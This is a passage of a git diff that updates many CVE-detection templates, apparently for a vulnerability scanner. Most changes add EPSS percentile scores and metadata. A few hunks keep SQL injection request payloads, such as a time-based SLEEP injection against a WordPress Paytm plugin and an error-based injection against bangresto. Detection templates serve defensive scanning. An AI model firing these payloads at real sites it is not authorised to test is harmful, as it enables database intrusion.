cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.32136
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml
index bfaa50156e..f68200b3a7 100644
--- a/http/cves/2022/CVE-2022-42746.yaml
+++ b/http/cves/2022/CVE-2022-42746.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*
+ epss-percentile: 0.28972
metadata:
max-request: 1
shodan-query: http.html:"CandidATS"
diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml
index 1ad514a408..521378ff57 100644
--- a/http/cves/2022/CVE-2022-42747.yaml
+++ b/http/cves/2022/CVE-2022-42747.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*
+ epss-percentile: 0.28972
metadata:
max-request: 1
shodan-query: http.html:"CandidATS"
diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml
index eca95e4cfe..4793e23357 100644
--- a/http/cves/2022/CVE-2022-42748.yaml
+++ b/http/cves/2022/CVE-2022-42748.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*
+ epss-percentile: 0.28972
metadata:
max-request: 1
shodan-query: http.html:"CandidATS"
diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml
index 38996496f7..63ec5e3c0b 100644
--- a/http/cves/2022/CVE-2022-42749.yaml
+++ b/http/cves/2022/CVE-2022-42749.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:*
+ epss-percentile: 0.28972
metadata:
max-request: 1
shodan-query: http.html:"CandidATS"
diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml
index 13640c4386..740754517b 100644
--- a/http/cves/2022/CVE-2022-4295.yaml
+++ b/http/cves/2022/CVE-2022-4295.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00064
cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.26173
metadata:
max-request: 1
publicwww-query: /wp-content/plugins/show-all-comments-in-one-page
diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml
index 7d972cda67..9a847e8eee 100644
--- a/http/cves/2022/CVE-2022-4301.yaml
+++ b/http/cves/2022/CVE-2022-4301.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-4301
cwe-id: CWE-79
- epss-score: 0.00064
+ epss-score: 0.00071
cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29012
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml
index 3f667ed2c6..4ccf4ab5ab 100644
--- a/http/cves/2022/CVE-2022-43014.yaml
+++ b/http/cves/2022/CVE-2022-43014.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
+ epss-percentile: 0.29005
metadata:
max-request: 2
shodan-query: title:"OpenCATS"
diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml
index 2ce1d484de..9af858dd46 100644
--- a/http/cves/2022/CVE-2022-43015.yaml
+++ b/http/cves/2022/CVE-2022-43015.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
+ epss-percentile: 0.29005
metadata:
max-request: 2
shodan-query: title:"OpenCATS"
diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml
index ccfdf44011..63bebdf198 100644
--- a/http/cves/2022/CVE-2022-43016.yaml
+++ b/http/cves/2022/CVE-2022-43016.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
+ epss-percentile: 0.29005
metadata:
max-request: 2
shodan-query: title:"OpenCATS"
diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml
index 4b0850c661..3f3b56cb23 100644
--- a/http/cves/2022/CVE-2022-43017.yaml
+++ b/http/cves/2022/CVE-2022-43017.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
+ epss-percentile: 0.29005
metadata:
max-request: 2
shodan-query: title:"OpenCATS"
diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml
index e5c6798efa..7df2778b8d 100644
--- a/http/cves/2022/CVE-2022-43018.yaml
+++ b/http/cves/2022/CVE-2022-43018.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
+ epss-percentile: 0.29005
metadata:
max-request: 2
shodan-query: title:"OpenCATS"
diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml
index 9c42c232b1..76fd5fd9e5 100644
--- a/http/cves/2022/CVE-2022-4306.yaml
+++ b/http/cves/2022/CVE-2022-4306.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0007
cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.28777
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml
index 858ebd69b0..f79ce6bc13 100644
--- a/http/cves/2022/CVE-2022-43140.yaml
+++ b/http/cves/2022/CVE-2022-43140.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-43140
cwe-id: CWE-918
- epss-score: 0.07021
+ epss-score: 0.05929
cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.92483
metadata:
max-request: 1
fofa-query: app="kkFileView"
diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml
index ca6dc5fb86..e4c138a4ec 100644
--- a/http/cves/2022/CVE-2022-43164.yaml
+++ b/http/cves/2022/CVE-2022-43164.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-43164
cwe-id: CWE-79
- epss-score: 0.00074
+ epss-score: 0.00076
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.31098
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml
index 9600cea438..a9515ad8f7 100644
--- a/http/cves/2022/CVE-2022-43165.yaml
+++ b/http/cves/2022/CVE-2022-43165.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-43165
cwe-id: CWE-79
- epss-score: 0.00074
+ epss-score: 0.00076
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.31098
metadata:
max-request: 3
shodan-query: http.favicon.hash:-1499940355
diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml
index 3990ed821d..0223f7819e 100644
--- a/http/cves/2022/CVE-2022-43166.yaml
+++ b/http/cves/2022/CVE-2022-43166.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-43166
cwe-id: CWE-79
- epss-score: 0.00074
+ epss-score: 0.00076
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.31098
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml
index a0c55d99e7..273310b3f8 100644
--- a/http/cves/2022/CVE-2022-43167.yaml
+++ b/http/cves/2022/CVE-2022-43167.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-43167
cwe-id: CWE-79
- epss-score: 0.00074
+ epss-score: 0.00076
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.31098
metadata:
verified: "true"
shodan-query: http.favicon.hash:-1499940355
diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml
index d4c465b64a..9d5e8c8040 100644
--- a/http/cves/2022/CVE-2022-43169.yaml
+++ b/http/cves/2022/CVE-2022-43169.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-43169
cwe-id: CWE-79
- epss-score: 0.00074
+ epss-score: 0.00076
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.31098
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml
index bc6ffe2a15..73c6fdf990 100644
--- a/http/cves/2022/CVE-2022-43170.yaml
+++ b/http/cves/2022/CVE-2022-43170.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-43170
cwe-id: CWE-79
- epss-score: 0.06363
+ epss-score: 0.08907
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.93778
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml
index ff8a278bf9..c83ad65b7e 100644
--- a/http/cves/2022/CVE-2022-43185.yaml
+++ b/http/cves/2022/CVE-2022-43185.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-43185
cwe-id: CWE-79
- epss-score: 0.06047
+ epss-score: 0.29169
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.96291
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml
index b559bfb09d..e73c395864 100644
--- a/http/cves/2022/CVE-2022-4320.yaml
+++ b/http/cves/2022/CVE-2022-4320.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00075
cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.30732
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml
index bc2dfd4c4b..894081b0df 100644
--- a/http/cves/2022/CVE-2022-4321.yaml
+++ b/http/cves/2022/CVE-2022-4321.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00064
cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.26173
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml
index cdaa9cec1e..51b640c47e 100644
--- a/http/cves/2022/CVE-2022-4325.yaml
+++ b/http/cves/2022/CVE-2022-4325.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-4325
cwe-id: CWE-79
- epss-score: 0.00064
+ epss-score: 0.00071
cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29012
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml
index a2852ce38d..8c90979ad8 100644
--- a/http/cves/2022/CVE-2022-4328.yaml
+++ b/http/cves/2022/CVE-2022-4328.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-434
epss-score: 0.96022
cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9925
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml
index 3c2346658e..7d36084a8c 100644
--- a/http/cves/2022/CVE-2022-43769.yaml
+++ b/http/cves/2022/CVE-2022-43769.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-43769
cwe-id: CWE-94,CWE-74
- epss-score: 0.05112
+ epss-score: 0.59738
cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97318
metadata:
max-request: 1
shodan-query: http.favicon.hash:1749354953
diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml
index c55063f34e..743890ff8e 100644
--- a/http/cves/2022/CVE-2022-4447.yaml
+++ b/http/cves/2022/CVE-2022-4447.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-4447
cwe-id: CWE-89
- epss-score: 0.09401
+ epss-score: 0.422
cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.96835
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml
index 2aeeb98be3..9a0d152306 100644
--- a/http/cves/2022/CVE-2022-44877.yaml
+++ b/http/cves/2022/CVE-2022-44877.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-44877
cwe-id: CWE-78
- epss-score: 0.97483
+ epss-score: 0.97473
cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99945
metadata:
max-request: 1
shodan-query: http.title:"Login | Control WebPanel"
diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml
index 438538003b..c04b4510af 100644
--- a/http/cves/2022/CVE-2022-44944.yaml
+++ b/http/cves/2022/CVE-2022-44944.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-44944
cwe-id: CWE-79
- epss-score: 0.00067
+ epss-score: 0.00074
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.3053
metadata:
max-request: 3
shodan-query: http.favicon.hash:-1499940355
diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml
index bed761a07b..14b389625a 100644
--- a/http/cves/2022/CVE-2022-44946.yaml
+++ b/http/cves/2022/CVE-2022-44946.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-44946
cwe-id: CWE-79
- epss-score: 0.00067
+ epss-score: 0.00074
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.3053
metadata:
max-request: 3
shodan-query: http.favicon.hash:-1499940355
diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml
index 5132e5094a..b899598924 100644
--- a/http/cves/2022/CVE-2022-44947.yaml
+++ b/http/cves/2022/CVE-2022-44947.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-44947
cwe-id: CWE-79
- epss-score: 0.0008
+ epss-score: 0.00088
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.36702
metadata:
max-request: 3
shodan-query: http.favicon.hash:-1499940355
diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml
index 6df00ba727..da924d4015 100644
--- a/http/cves/2022/CVE-2022-44948.yaml
+++ b/http/cves/2022/CVE-2022-44948.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-44948
cwe-id: CWE-79
- epss-score: 0.00067
+ epss-score: 0.00074
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.3053
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml
index 49bf9cdb93..05ca35336c 100644
--- a/http/cves/2022/CVE-2022-44949.yaml
+++ b/http/cves/2022/CVE-2022-44949.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-44949
cwe-id: CWE-79
- epss-score: 0.00067
+ epss-score: 0.00074
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.3053
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml
index b46106c091..2f4a227baf 100644
--- a/http/cves/2022/CVE-2022-44950.yaml
+++ b/http/cves/2022/CVE-2022-44950.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-44950
cwe-id: CWE-79
- epss-score: 0.00067
+ epss-score: 0.00074
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.3053
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml
index e4369fe3eb..047599d29b 100644
--- a/http/cves/2022/CVE-2022-44951.yaml
+++ b/http/cves/2022/CVE-2022-44951.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-44951
cwe-id: CWE-79
- epss-score: 0.00067
+ epss-score: 0.00074
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.3053
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml
index 98f54d6db4..6c9ea339d2 100644
--- a/http/cves/2022/CVE-2022-44952.yaml
+++ b/http/cves/2022/CVE-2022-44952.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-44952
cwe-id: CWE-79
- epss-score: 0.05501
+ epss-score: 0.06042
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.92539
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml
index 97535024df..5f4c2ea395 100644
--- a/http/cves/2022/CVE-2022-45037.yaml
+++ b/http/cves/2022/CVE-2022-45037.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00077
cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*
+ epss-percentile: 0.31826
metadata:
max-request: 5
verified: true
diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml
index acd52bc182..81c75cc893 100644
--- a/http/cves/2022/CVE-2022-45038.yaml
+++ b/http/cves/2022/CVE-2022-45038.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00077
cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*
+ epss-percentile: 0.31826
metadata:
max-request: 5
verified: true
diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml
index 93a83beca0..171363e953 100644
--- a/http/cves/2022/CVE-2022-45805.yaml
+++ b/http/cves/2022/CVE-2022-45805.yaml
@@ -6,16 +6,16 @@ info:
severity: critical
description: |
WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
- remediation: Update to version 2.7.7 or a newer patched version.
reference:
- https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability
- https://wordpress.org/plugins/paytm-payments/
- https://nvd.nist.gov/vuln/detail/CVE-2022-45805
+ remediation: Update to version 2.7.7 or a newer patched version.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
- cwe-id: CWE-89
cve-id: CVE-2022-45805
+ cwe-id: CWE-89
metadata:
max-request: 2
verified: true
@@ -29,7 +29,6 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
-
- |
@timeout: 15s
GET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1
diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml
index b114e719e1..2ad70d2009 100644
--- a/http/cves/2022/CVE-2022-45835.yaml
+++ b/http/cves/2022/CVE-2022-45835.yaml
@@ -6,16 +6,16 @@ info:
severity: medium
description: |
WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
- remediation: Fixed in version 2.0.0.
reference:
- https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf
- https://wordpress.org/plugins/phonepe-payment-solutions/
- https://nvd.nist.gov/vuln/detail/CVE-2022-45835
+ remediation: Fixed in version 2.0.0.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
- cwe-id: CWE-918
cve-id: CVE-2022-45835
+ cwe-id: CWE-918
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml
index c4cbff26b7..5e186231ac 100644
--- a/http/cves/2022/CVE-2022-45917.yaml
+++ b/http/cves/2022/CVE-2022-45917.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00135
cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:*
+ epss-percentile: 0.47995
metadata:
max-request: 2
shodan-query: http.html:"ILIAS"
diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml
index 5a2710d871..79001b8f00 100644
--- a/http/cves/2022/CVE-2022-45933.yaml
+++ b/http/cves/2022/CVE-2022-45933.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-45933
- cwe-id: CWE-287
- epss-score: 0.00292
+ cwe-id: CWE-306
+ epss-score: 0.00535
cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:*
+ epss-percentile: 0.74218
metadata:
max-request: 1
shodan-query: http.title:"KubeView"
diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml
index 6feb465c35..88c62e33ac 100644
--- a/http/cves/2022/CVE-2022-46020.yaml
+++ b/http/cves/2022/CVE-2022-46020.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-46020
cwe-id: CWE-434
- epss-score: 0.00815
+ epss-score: 0.00887
cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*
+ epss-percentile: 0.8053
metadata:
max-request: 6
verified: true
diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml
index 56761daf56..4ae27a0840 100644
--- a/http/cves/2022/CVE-2022-46071.yaml
+++ b/http/cves/2022/CVE-2022-46071.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-46071
cwe-id: CWE-89
- epss-score: 0.00866
+ epss-score: 0.01728
cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.86294
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml
index cfa3d7053b..654eaa6dd2 100644
--- a/http/cves/2022/CVE-2022-46073.yaml
+++ b/http/cves/2022/CVE-2022-46073.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-46073
cwe-id: CWE-79
- epss-score: 0.00097
+ epss-score: 0.00077
cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.31755
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml
index f76ca7c247..0919c497a0 100644
--- a/http/cves/2022/CVE-2022-46169.yaml
+++ b/http/cves/2022/CVE-2022-46169.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-46169
cwe-id: CWE-78,CWE-74
- epss-score: 0.96835
+ epss-score: 0.96817
cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99543
metadata:
max-request: 1
shodan-query: title:"Login to Cacti"
diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml
index 7c0cff707b..9be7946e7a 100644
--- a/http/cves/2022/CVE-2022-46381.yaml
+++ b/http/cves/2022/CVE-2022-46381.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-46381
cwe-id: CWE-79
- epss-score: 0.00064
+ epss-score: 0.00071
cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:*
+ epss-percentile: 0.29012
metadata:
max-request: 1
shodan-query: http.html:"Linear eMerge"
diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml
index 6aa49f5888..8847704d75 100644
--- a/http/cves/2022/CVE-2022-46443.yaml
+++ b/http/cves/2022/CVE-2022-46443.yaml
@@ -14,11 +14,15 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-46443
cwe-id: CWE-89
+ epss-score: 0.11658
+ cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94542
metadata:
max-request: 2
verified: true
+ vendor: bangresto_project
+ product: bangresto
tags: cve,cve2022,bangresto,sqli
-
variables:
num: "999999999"
@@ -30,7 +34,6 @@ http:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}}
-
- |
POST /bangresto-main/staff/insertorder.php HTTP/1.1
Host: {{Hostname}}
@@ -39,6 +42,7 @@ http:
itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen
cookie-reuse: true
+
matchers-condition: and
matchers:
- type: word
diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml
index 3579201530..8a51ed2af5 100644
--- a/http/cves/2022/CVE-2022-46463.yaml
+++ b/http/cves/2022/CVE-2022-46463.yaml
@@ -8,14 +8,23 @@ info:
An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-46463
+ - https://github.com/Vad1mo
+ - https://github.com/lanqingaa/123/blob/main/README.md
+ - https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
+ cve-id: CVE-2022-46463
cwe-id: CWE-306
+ epss-score: 0.01786
+ cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86525
metadata:
max-request: 1
shodan-query: http.favicon.hash:657337228
verified: true
+ vendor: linuxfoundation
+ product: harbor
tags: cve,cve2022,harbor,auth-bypass,exposure
http:
diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml
index bc73676b07..304c5bf9bf 100644
--- a/http/cves/2022/CVE-2022-46888.yaml
+++ b/http/cves/2022/CVE-2022-46888.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00081
cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:*
+ epss-percentile: 0.33383
metadata:
max-request: 1
